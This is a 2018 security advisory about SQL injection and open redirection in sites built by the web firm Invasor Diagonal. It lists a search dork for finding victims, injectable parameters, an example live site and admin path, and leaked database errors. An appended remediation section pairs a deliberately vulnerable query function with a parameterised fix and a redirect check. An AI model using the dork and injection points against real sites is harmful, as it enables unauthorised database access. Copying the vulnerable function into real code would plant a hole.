Web Development Invasor Diagonal SQL Injection and Open Redirection Vulnerability

2018.10.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################
# Exploit Title : Web Development Invasor Diagonal SQL Injection and Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : invasordiagonal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] + CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
#################################################################################################
# Google Dork : intext:''web development // invasor diagonal''
# Admin Control Panel Login Path => /site_DOMAINNAMEADDRESSHERE_UAT/admin/ /admin/
# SQL Injection Exploits :
/eventos.php?id=[SQL Injection]
/tenistas.php?id=[SQL Injection]
/profesionales_header.php?id=[SQL Injection]
/novedades.php?id=[SQL Injection]
/eventosCorporativos.php?id=[SQL Injection]
/marcas.php?id=[SQL Injection]
# Open Redirection Exploit => TARGET/site_DOMAINNAMEADDRESSHERE_UAT/set_language.php?idioma=2&gourl=https://www.REDIRECTIONADDRESSHERE.gov
#################################################################################################
# Example Vulnerable Site => exxiasports.com/eventos.php?id=2%27 => [ Proof of Concept ] => archive.is/b9eAH
# Example Admin Panel Path => exxiasports.com/site_exxia_UAT/admin/ => [ Proof of Concept ] => archive.is/fO8Pi
# Example Open Redirection Vuln Proof of Concept => exxiasports.com/site_exxia_UAT/set_language.php?idioma=2&gourl=https://cxsecurity.com => archive.is/7Ay4h
# SQL Database Error =>
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Destacado = 1 LIMIT 1' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Extension = 'jpg' AND Destacado = 0 ORDER BY OrdenIma' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Objeto = 'Eventos' ORDER BY Orden' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Extension != 'jpg' ORDER BY OrdenImagen' at line 1]
Warning: Invalid argument supplied for foreach() in /nfs/c05/h01/mnt/72313/domains/exxiasports.com/html/novedades.php on line 43
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
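The two weaknesses in the advisory (CWE-89 in the `id` parameter of the listed scripts, CWE-601 in the `gourl` parameter of `set_language.php`) both come down to untrusted query-string values reaching a sink unchanged. The PHP below is an added remediation example written for this page; it is not the vendor's code, and the table name `eventos`, the column `Id`, and the structure of `set_language.php` are assumptions (the only schema hints on the page are the column names visible in the leaked MySQL errors, such as `Destacado`). It shows the concatenation pattern that produces the errors quoted above next to a parameterised query, and a `gourl` check that only honours same-site paths.

```php
<?php
// Added example, not the vendor's code. Table/column names and the shape of
// set_language.php are assumptions for illustration.
declare(strict_types=1);

/**
 * The pattern the leaked errors point to: the raw `id` value is spliced
 * into the SQL text. A trailing quote (id=2') breaks the statement, MySQL
 * raises a syntax error, and the error text is echoed to the client.
 * Kept here only as the "before" for contrast.
 */
function fetchEventoVulnerable(PDO $pdo, string $rawId): ?array
{
    $sql = "SELECT * FROM eventos WHERE Id = " . $rawId
         . " AND Destacado = 1 LIMIT 1";
    $stmt = $pdo->query($sql);              // syntax error surfaces here
    $row  = $stmt ? $stmt->fetch(PDO::FETCH_ASSOC) : false;
    return $row === false ? null : $row;
}

/**
 * Hardened version: validate the type first, then bind the value as a
 * parameter so it can never change the shape of the statement.
 */
function fetchEvento(PDO $pdo, string $rawId): ?array
{
    // Ids are positive integers; anything else is rejected before the DB is touched.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $pdo->prepare(
        'SELECT * FROM eventos WHERE Id = :id AND Destacado = 1 LIMIT 1'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Open-redirect fix for the `gourl` parameter: the value is only used when
 * it is a path on this site. Absolute URLs, protocol-relative URLs (//host),
 * backslash variants (/\host) and control characters (header injection) all
 * fall back to a fixed local path.
 */
function safeReturnPath(?string $gourl, string $fallback = '/'): string
{
    if ($gourl === null || $gourl === '') {
        return $fallback;
    }
    // Reject CR/LF and other control bytes so the Location header cannot be split.
    if (preg_match('/[\x00-\x1F\x7F]/', $gourl) === 1) {
        return $fallback;
    }
    // Must start with exactly one "/" and must not start with "//" or "/\".
    if ($gourl[0] !== '/' || (strlen($gourl) > 1 && ($gourl[1] === '/' || $gourl[1] === '\\'))) {
        return $fallback;
    }
    // Belt and braces: parse_url must see neither a scheme nor a host.
    $parts = parse_url($gourl);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $fallback;
    }
    return $gourl;
}

// Assumed usage inside set_language.php after the language has been stored:
//   header('Location: ' . safeReturnPath($_GET['gourl'] ?? null, '/'), true, 302);
//   exit;
```

Two further points a reviewer would raise from the advisory's evidence: the verbatim MySQL messages and the absolute path `/nfs/c05/h01/mnt/72313/domains/...` only reach the browser because database and PHP errors are displayed rather than logged, so `display_errors=Off` in production (with logging left on) removes that information leak independently of the query fix; and the `foreach()` warning shows the scripts iterate over a result that can be `false`, which `fetchEvento()` avoids by always returning an array or `null`.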

References:

https://www.cyberizm.org/cyberizm-invasor-diagonal-sql-inj-and-open-redirection-vuln.html


Copyright 2018, cxsecurity.com